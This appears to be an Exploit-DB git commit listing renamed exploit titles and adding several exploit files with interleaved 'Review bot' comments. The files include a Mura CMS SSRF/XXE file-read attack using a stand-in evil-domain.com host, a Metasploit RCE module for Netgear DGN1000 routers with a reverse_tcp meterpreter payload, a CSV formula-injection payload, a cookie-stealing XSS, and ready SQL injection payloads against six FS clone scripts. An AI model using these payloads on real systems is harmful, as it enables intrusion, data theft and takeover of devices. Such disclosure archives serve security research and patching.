F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities
F*EX 20100208/20111129-2 - Cross-Site Scripting Multiple Vulnerabilities

Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities
Webglimpse 2.x - Cross-Site Scripting Multiple Vulnerabilities

OSQA's CMS - Multiple HTML Injection Vulnerabilities
OSQA's CMS - HTML Injection Multiple Vulnerabilities

Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities
Matthew1471 BlogX - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Uploadify Integration 0.9.6 - Cross-Site Scripting Multiple Vulnerabilities

Joomla! Plugin Beatz 1.1 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Plugin Beatz 1.1 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Yahoo Answer - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Yahoo Answer - Cross-Site Scripting Multiple Vulnerabilities

Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities
Croogo CMS 1.3.4 - HTML Injection Multiple Vulnerabilities

WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin NewsLetter Manager 1.0 - Cross-Site Scripting Multiple Vulnerabilities
WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Media Library Categories - Cross-Site Scripting Multiple Vulnerabilities
WordPress Plugin LeagueManager 3.7 - Cross-Site Scripting Multiple Vulnerabilities

PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities
PHP Address Book 7.0 - Cross-Site Scripting Multiple Vulnerabilities

Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities
Opsview 4.6.2 - Cross-Site Scripting Multiple Vulnerabilities

SPIP 2.x - Multiple Cross-Site Scripting Vulnerabilities
SPIP 2.x - Cross-Site Scripting Multiple Vulnerabilities

TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities
TEMENOS T24 - Cross-Site Scripting Multiple Vulnerabilities

WebsitePanel - 'ReturnUrl' URI Redirection
WebsitePanel - 'ReturnUrl'  Open Redirection

Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities
Simple Machines 2.0.2 - HTML Injection Multiple Vulnerabilities
ocPortal 7.1.5 - 'redirect' URI Redirection
Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities
ocPortal 7.1.5 - 'redirect'  Open Redirection
Scrutinizer 9.0.1.19899 - Cross-Site Scripting Multiple Vulnerabilities

Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities
Distimo Monitor - Cross-Site Scripting Multiple Vulnerabilities

Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities
Total Shop UK eCommerce CodeIgniter - Cross-Site Scripting Multiple Vulnerabilities

Monstra - Multiple HTML Injection Vulnerabilities
Monstra - HTML Injection Multiple Vulnerabilities

Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities
Power-eCommerce - Cross-Site Scripting Multiple Vulnerabilities
Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities
LibGuides - Multiple Cross-Site Scripting Vulnerabilities
Web Wiz Forums - Cross-Site Scripting Multiple Vulnerabilities
LibGuides - Cross-Site Scripting Multiple Vulnerabilities
Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities
PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities
Phorum 5.2.18 - Cross-Site Scripting Multiple Vulnerabilities
PrestaShop 1.4.7 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Slideshow - Cross-Site Scripting Multiple Vulnerabilities

Silverstripe CMS 2.4.x - 'BackURL' URI Redirection
Silverstripe CMS 2.4.x - 'BackURL'  Open Redirection

AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities
AxisInternet VoIP Manager - Cross-Site Scripting Multiple Vulnerabilities

WordPress Theme Purity - Multiple Cross-Site Scripting Vulnerabilities
WordPress Theme Purity - Cross-Site Scripting Multiple Vulnerabilities

Switchvox - Multiple HTML Injection Vulnerabilities
Switchvox - HTML Injection Multiple Vulnerabilities

WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Akismet - Cross-Site Scripting Multiple Vulnerabilities

WANem - Multiple Cross-Site Scripting Vulnerabilities
WANem - Cross-Site Scripting Multiple Vulnerabilities

NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities
NetCat CMS - Cross-Site Scripting Multiple Vulnerabilities

BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities
BloofoxCMS 0.3.5 - Cross-Site Scripting Multiple Vulnerabilities

WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities
WordPress Plugin Contact Form Generator 2.0.1 - Cross-Site Request Forgery Multiple Vulnerabilities

Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities
Smartphone Pentest Framework - Remote Command Execution Multiple Vulnerabilities

Joomla! Component com_incapsula - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component com_incapsula - Cross-Site Scripting Multiple Vulnerabilities

Openfire 3.10.2 - Multiple Cross-Site Scripting Vulnerabilities
Openfire 3.10.2 - Cross-Site Scripting Multiple Vulnerabilities

Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
Perforce P4Web - Cross-Site Scripting Multiple Vulnerabilities

Sonar - Multiple Cross-Site Scripting Vulnerabilities
Sonar - Cross-Site Scripting Multiple Vulnerabilities

MIMEsweeper For SMTP - Multiple Cross-Site Scripting Vulnerabilities
MIMEsweeper For SMTP - Cross-Site Scripting Multiple Vulnerabilities

phpMyRecipes - Multiple HTML Injection Vulnerabilities
phpMyRecipes - HTML Injection Multiple Vulnerabilities

OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities
OrionDB Web Directory - Cross-Site Scripting Multiple Vulnerabilities

PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities
PHP Server Monitor 3.1.1 - Cross-Site Request Forgery Multiple Vulnerabilities

Elastix - Multiple Cross-Site Scripting Vulnerabilities
Elastix - Cross-Site Scripting Multiple Vulnerabilities

Telaen 2.7.x - Open redirection
Telaen 2.7.x - Open Redirection

Xaraya - Multiple Cross-Site Scripting Vulnerabilities
Xaraya - Cross-Site Scripting Multiple Vulnerabilities

Mintboard - Multiple Cross-Site Scripting Vulnerabilities
Mintboard - Cross-Site Scripting Multiple Vulnerabilities

NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities
NXFilter 3.0.3 - Cross-Site Scripting Multiple Vulnerabilities

PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities
PrestaShop - Cross-Site Request Forgery Multiple Vulnerabilities

Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities
Magnolia CMS - Cross-Site Scripting Multiple Vulnerabilities

Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities
Alienvault Open Source SIEM (OSSIM) - Cross-Site Scripting Multiple Vulnerabilities

appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities
appRain CMF - Cross-Site Request Forgery Multiple Vulnerabilities

WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities
WordPress Plugin Event Easy Calendar - Cross-Site Request Forgery Multiple Vulnerabilities

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
Silverstripe CMS - HTML Injection Multiple Vulnerabilities

OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities
OpenMRS 2.3 (1.11.4) - Cross-Site Scripting Multiple Vulnerabilities

OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities
OpenX 2.8.x - Cross-Site Request Forgery Multiple Vulnerabilities

ZamFoo - Multiple Remote Command Execution Vulnerabilities
ZamFoo - Remote Command Execution Multiple Vulnerabilities

ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities
ATutor 2.2 - Cross-Site Scripting Multiple Vulnerabilities

ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities
ProjectSend r582 - Cross-Site Scripting Multiple Vulnerabilities

NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities
NationBuilder - Persistent Cross-Site Scripting Multiple Vulnerabilities

w2wiki - Multiple Cross-Site Scripting Vulnerabilities
w2wiki - Cross-Site Scripting Multiple Vulnerabilities

Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Radiant CMS 1.1.3 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities
Apache Archiva 1.3.9 - Cross-Site Request Forgery Multiple Vulnerabilities

Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities
Wowza Streaming Engine 4.5.0 - Cross-Site Scripting Multiple Vulnerabilities

Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities
Nagios Network Analyzer 2.2.1 - Cross-Site Request Forgery Multiple Vulnerabilities

InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities
InfraPower PPS-02-S Q213V1 - Cross-Site Scripting Multiple Vulnerabilities

ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities
ViMbAdmin 3.0.15 - Cross-Site Request Forgery Multiple Vulnerabilities

PHPMyFAQ 2.9.8 - Cross-Site Scripting
PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)

phpMyFAQ 2.9.8 - Cross-Site Scripting
phpMyFAQ 2.9.8 - Cross-Site Scripting (2)

Kaltura < 13.1.0 - Remote Code Execution
Kaltura < 13.2.0 - Remote Code Execution
Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection
FS Shutter Stock Clone - 'keywords' SQL Injection
FS Thumbtack Clone - 'ser' SQL Injection
FS Trademe Clone - 'id' SQL Injection
FS Monster Clone - 'id' SQL Injection
FS Care Clone - 'sitterService' SQL Injection
FS Crowdfunding Script - 'id' SQL Injection
FS Realtor Clone - 'id' SQL Injection
KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection
KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-10-26 05:01:38 +00:00
parent 5bd93d7e45
commit c9ca104d1d
13 changed files with 1199 additions and 673 deletions

1347
files.csv

File diff suppressed because it is too large

57
platforms/cfm/webapps/43045.txt Executable file

@ -0,0 +1,57 @@
# Exploit Title: Mura CMS before 6.2 SSRF + XXE
# Date: 30-10-2017
# Exploit Author: Anthony Cole
# Vendor Homepage: http://www.getmura.com/
# Version: before 6.2
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: Windows 2008 w/ Coldfusion 8
# CVE: CVE-2017-15639
# Category: webapps
1. Description
Any user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.
2. Proof of Concept
vulnerable file is on github, line 50:
https://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm
http://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500
Explanation of params
siteid - The siteid can be obtained by viewing the html source code of the target home page and searching "siteid".
rssurl - This is the URL you want Mura CMS to call out to.
To perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80
Then create a file:
<?xml version="1.0" ?>
<!DOCTYPE rss [
<!ENTITY send SYSTEM "file:///c:\Windows\System32\drivers\etc\hosts">
]>
<rss version="2.0">
<channel>
<title>title</title>
<link>link</link>
<description>description</description>
<generator>http://www.getmura.com</generator>
<pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>
<language>en-us</language>
<item>
<title>Item title</title>
<link>http://host/</link>
<guid isPermaLink="false">00000000-0000-0000-0000000000000000</guid>
<pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>
<description>&send;</description>
</item>
</channel>
</rss>
3. Solution:
delete readRSS.cfm from the server.
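Review bot: The "3. Solution" section only says to delete readRSS.cfm and never mentions upgrading, although the header ("# Version: before 6.2") and the description both scope the issue to releases before 6.2; list upgrading to 6.2 or later as the primary remediation and keep file removal as the interim workaround. The header line "# Date: 30-10-2017" is later than this commit's own timestamp (2017-10-26) and should be corrected. The sample feed is also not set off from the surrounding prose, so a reader cannot tell where the file content begins and ends, and its pubDate values are in 2018.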


@ -0,0 +1,94 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
'Description' => %q{
This module exploits an unauthenticated OS command execution vulneralbility
in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
DGN2000v1 models.
},
'Author' => [
'Mumbai <https://github.com/realoriginal>', # module
'Robort Palerie <roberto@greyhats.it>' # vuln discovery
],
'References' => [
['EDB', '25978'],
],
'DisclosureDate' => 'Jun 5 2013',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
end
def check
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET'
})
if res && res.headers['WWW-Authenticate']
auth = res.headers['WWW-Authenticate']
if auth =~ /DGN1000/
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
end
print_status("#{peer} - Exploiting target ....")
execute_cmdstager(
:flavor => :wget,
:linemax => 200,
:concat_operator => " && "
)
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET',
'vars_get' => {
'next_file' => 'netgear.cfg',
'todo' => 'syscmd',
'cmd' => cmd.to_s,
'curpath' => '/',
'currentsetting.htm' => '1'
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
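Review bot: The 'Description' and 'Author' strings contain spelling errors: "vulneralbility" should read "vulnerability", and the discoverer is credited as "Robort Palerie" beside the address roberto@greyhats.it, so the name should be checked against the referenced entry (EDB 25978). Separately, `check` returns Detected purely from a /DGN1000/ match in the WWW-Authenticate header, which identifies the model and not the firmware level, while the description also lists DGN2000v1. A comment on `check` stating that Detected means a model match only would keep the result from being read as confirmation of a vulnerable build.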


@ -0,0 +1,49 @@
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated CSV Injection
# Vendor Homepage: http://keystonejs.com/
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: WEBAPPS
# Platform: Node.js
# CVE: CVE-2017-15879
Vendor Description:
KeystoneJS is a powerful Node.js content management system and web app
framework built on express and mongoose. Keystone makes it easy to create
sophisticated web sites and apps, and comes with a beautiful auto-generated
Admin UI.
Source: https://github.com/keystonejs/keystone/blob/master/README.md
Technical Details and Exploitation:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS
before 4.0.0-beta.7 via a value that is mishandled in a CSV export.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15879
Proof of Concept:
1.Go to Contact Us page and insert the below payload in the Name Field.
Payload: @SUM(1+1)*cmd|' /C calc'!A0
2. Login as Admin
3. Now Navigate to Enquiries page and check the entered payload.
4. Download as .csv, once done open it in excel and observe that calculator
application gets open.
Solution:
The issues have been fixed and the vendor has released the patches
https://github.com/keystonejs/keystone/pull/4478/commits/1b791d55839ebf434e104cc9936ccb8c29019231
Reference:
https://github.com/keystonejs/keystone/pull/4478
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
--
Best Regards,
Ishaq Mohammed
https://about.me/security-prince
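Review bot: The Solution section gives only a commit URL, while the fixed release appears earlier, in Technical Details ("before 4.0.0-beta.7"). State in the Solution that upgrading to 4.0.0-beta.7 or later is the remediation, so an administrator reading only that section knows what to deploy. The header block also has no Date line, and step 1 reads "1.Go to" without a space, unlike steps 2 to 4.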


@ -0,0 +1,46 @@
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated Stored XSS
# Vendor Homepage: http://keystonejs.com/
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: WEBAPPS
# Platform: Node.js
# CVE: CVE-2017-15878
Vendor Description:
KeystoneJS is a powerful Node.js content management system and web app
framework built on express and mongoose. Keystone makes it easy to create
sophisticated web sites and apps, and comes with a beautiful auto-generated
Admin UI.
Source: https://github.com/keystonejs/keystone/blob/master/README.md
Technical Details and Exploitation:
A cross-site scripting (XSS) vulnerability exists in
fields/types/markdown/MarkdownType.js in KeystoneJS before 4.0.0-beta.7 via
the Contact Us feature.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15878
Proof of Concept:
1. Navigate to Contact Us page
2. Fill in the details needed and enter the below payload in message field
and send
<a onmouseover=alert(document.cookie)>XSS link</a>
3. Now login as admin and navigate to the above new record created in the
enquiries
4. Move the cursor on the text “XSS link”
Solution:
The issues have been fixed and the vendor has released the patches
https://github.com/keystonejs/keystone/pull/4478/commits/5cb6405dfc0b6d59003c996f8a4aa35baa6b2bac
Reference:
https://github.com/keystonejs/keystone/pull/4478
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
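Review bot: Technical Details names fields/types/markdown/MarkdownType.js and "the Contact Us feature" but not the input that is stored and later rendered. The PoC shows it is the message field, so name it there together with the view where it is rendered (the admin enquiries record in step 3). Step 4 wraps "XSS link" in typographic quotes; plain ASCII quotes are safer in a .txt advisory.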

41
platforms/php/webapps/43046.txt Executable file

@ -0,0 +1,41 @@
# Exploit Title: FS Shutter Stock Clone - 'keywords' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/shutterstock-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
This is a versatile script to help you to launch a stock photo like Shutterstock.
Technical Details & Description:
================================
SQL injection on [keywords] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/Category/
Parameter: keywords (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: keywords=SEARCH' AND (SELECT 2673 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(2673=2673,1))),0x71767a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UqZI'='UqZI&category=3
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: keywords=SEARCH' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706b71,0x6251747761714a75646f44454749674748584975524b6c59687576456c68696761764659764a6954,0x71767a6b71)-- HXrZ&category=3
==================
8bitsec - [https://twitter.com/_8bitsec]
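Review bot: "# Version: 24 October 17" is a date, not a version identifier, so the advisory does not tell an operator which builds are affected. If the vendor publishes no version numbers, say so explicitly and label the line as the date on which the product was obtained and tested.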

37
platforms/php/webapps/43047.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: FS Thumbtack Clone - 'ser' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/thumbtack-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
Marketplace Script is a popular software solution helping you launch a marketplace website within minutes.
Technical Details & Description:
================================
SQL injection on [ser] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/service-provider.php?ser=9631
Parameter: ser (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ser=9631' AND 8601=8601 AND 'ZarH'='ZarH
==================
8bitsec - [https://twitter.com/_8bitsec]
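Review bot: The Product & Service Introduction describes a "Marketplace Script", while the title and the Software Link refer to FS Thumbtack Clone. Confirm that the text belongs to this product, or replace it with the vendor's description of the Thumbtack clone, so the advisory cannot be mistaken for one about a different script.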

37
platforms/php/webapps/43048.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: FS Trademe Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/trademe-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
This is possibly the only software solution to facilitate launching of a portal with features like auction, eCommerce, B2B, Real Estate, Job Portal and classifieds all in one similar to Trademe.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/property_details.php?id=12 AND 3616=3616
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12 AND 3616=3616
==================
8bitsec - [https://twitter.com/_8bitsec]
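Review bot: Technical Details says only "SQL injection on [id] parameter.", although the PoC carries the facts a maintainer needs: the affected script is property_details.php, and the payload "id=12 AND 3616=3616" is unquoted, so the value reaches the query in a numeric context. Put both in Technical Details so that the fix (integer validation of id plus a parameterized query) is evident without reading the payload.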

37
platforms/php/webapps/43049.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: FS Monster Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/monster-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
A highly sought after W3 compliant web solution standing out tall with a host of exciting features packed in.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/Job_Details.php?id=6 AND 9364=9364
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 9364=9364
==================
8bitsec - [https://twitter.com/_8bitsec]

37
platforms/php/webapps/43050.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: FS Care Clone - 'sitterService' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/care-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
This product brings the most ideal solution to launch a portal dealing with every aspect of hiring care in a hasslefree manner.
Technical Details & Description:
================================
SQL injection on [sitterService] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/searchJob.php?sitterService=1' AND 2728=2728 AND 'fhir'='fhir
Parameter: sitterService (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sitterService=1' AND 2728=2728 AND 'fhir'='fhir
==================
8bitsec - [https://twitter.com/_8bitsec]
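Review bot: The "SQLi:" URL line embeds the whole payload, with unencoded spaces and quotes, and the Payload line then repeats it. List the base request (searchJob.php?sitterService=1) once and keep the payload only on the Payload line, as the 'ser' entry in this commit does.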

37
platforms/php/webapps/43051.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: FS Crowdfunding Script - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/crowdfunding-script/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
Fortune Crowdfunding Script is a popular crowdfunding script developed in jQuery, PHP and MySQL.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/page_running_projects_details.php?id=11' AND 5391=5391 AND 'Qkwz'='Qkwz
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5391=5391 AND 'Qkwz'='Qkwz
==================
8bitsec - [https://twitter.com/_8bitsec]

41
platforms/php/webapps/43052.txt Executable file

@ -0,0 +1,41 @@
# Exploit Title: FS Realtor Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/realtor-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
The realtor business anywhere is dependent essentially on the support provided by a robust digital platform offering diverse solutions at fingertips.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/property_detail.php?id=29 AND 4599=4599
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=29 AND 4599=4599
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=29 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
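Review bot: The "Release Date" section repeats the "# Date: 2017-10-24" header, and the advisory ends after the PoC with no remediation or vendor-notification information. Replace the duplicate with a short disclosure timeline and add a Solution section stating whether a fixed build exists. Since both a boolean-based and a time-based technique are listed for the unquoted id value, the minimum useful guidance is that id be validated as an integer and bound as a query parameter.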


@ -1,8 +1,10 @@
source: http://www.securityfocus.com/bid/6043/info
A problem in SolarWinds TFTP Server may result in a denial of service, and may have other ramifications. SolarWinds TFTP Server is distributed for the Microsoft Windows platform.
Under some circumstances, it may be possible to crash a vulnerable TFTP server. By sending a UDP packet to the server that is 8193 or more bytes, the server becomes unstable. It has been reported that doing this can consistently reproduce a crash of the server, requiring a manual restart to resume normal operation.
#source: http://www.securityfocus.com/bid/6043/info
#
#A problem in SolarWinds TFTP Server may result in a denial of service, and may have other ramifications. SolarWinds TFTP Server is distributed for the Microsoft Windows platform.
#
#Under some circumstances, it may be possible to crash a vulnerable TFTP server. By sending a UDP packet to the server that is 8193 or more bytes, the server becomes unstable. It has been reported that doing this can consistently reproduce a crash of the server, requiring a manual restart to resume normal operation.
#
#
#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
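Review bot: The commented header is inserted above "#!/usr/bin/perl", so the interpreter line is no longer the first line of the file and is not honored as a shebang when the script is executed directly. Keep "#!/usr/bin/perl" as line 1 and place the "#source:" comment block below it. The two bare "#" lines that end the block can be reduced to one.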